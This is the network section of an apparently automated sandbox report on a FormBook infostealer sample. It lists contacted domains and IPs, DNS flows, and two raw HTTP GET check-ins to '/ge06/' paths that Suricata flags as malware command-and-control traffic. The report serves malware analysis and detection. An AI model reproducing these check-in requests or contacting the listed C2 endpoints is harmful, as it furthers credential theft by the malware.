Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.carat-automotive.com | ||
www.waveoflife.pro | 66.96.162.150 | |
www.booptee.com | ||
www.batcavela.com |
CNAME
342284.parkingcrew.net
|
13.248.148.254 |
www.lodsoab.com |
- UDP Requests
-
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:49154 239.255.255.250:1900
-
GET
403
http://www.batcavela.com/ge06/?kHQD=Q330Nlrdd7wjbNOXaSC7JMUzln/+sA0fy8mpHysJLBlsNI2WRIrp3yqbQPXqvCDIbk6bxFbG&D81h=O2MHdPrXY
REQUEST
RESPONSE
BODY
GET /ge06/?kHQD=Q330Nlrdd7wjbNOXaSC7JMUzln/+sA0fy8mpHysJLBlsNI2WRIrp3yqbQPXqvCDIbk6bxFbG&D81h=O2MHdPrXY HTTP/1.1
Host: www.batcavela.com
Connection: close
HTTP/1.1 403 Forbidden
Date: Sat, 11 Nov 2023 07:21:50 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Server: nginx
Vary: Accept-Encoding
GET
404
http://www.waveoflife.pro/ge06/?kHQD=MT2lmuLr4xW4Y36Na+kfxB+SBx3z6weHsbIXVLyeZmOnioiBuNRbSrEPi8rGHADI09fpEf4R&D81h=O2MHdPrXY
REQUEST
RESPONSE
BODY
GET /ge06/?kHQD=MT2lmuLr4xW4Y36Na+kfxB+SBx3z6weHsbIXVLyeZmOnioiBuNRbSrEPi8rGHADI09fpEf4R&D81h=O2MHdPrXY HTTP/1.1
Host: www.waveoflife.pro
Connection: close
HTTP/1.1 404 Not Found
Date: Sat, 11 Nov 2023 07:22:11 GMT
Content-Type: text/html
Content-Length: 867
Connection: close
Server: Apache/2
Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
Accept-Ranges: bytes
Age: 0
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49167 -> 66.96.162.150:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49166 -> 13.248.148.254:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts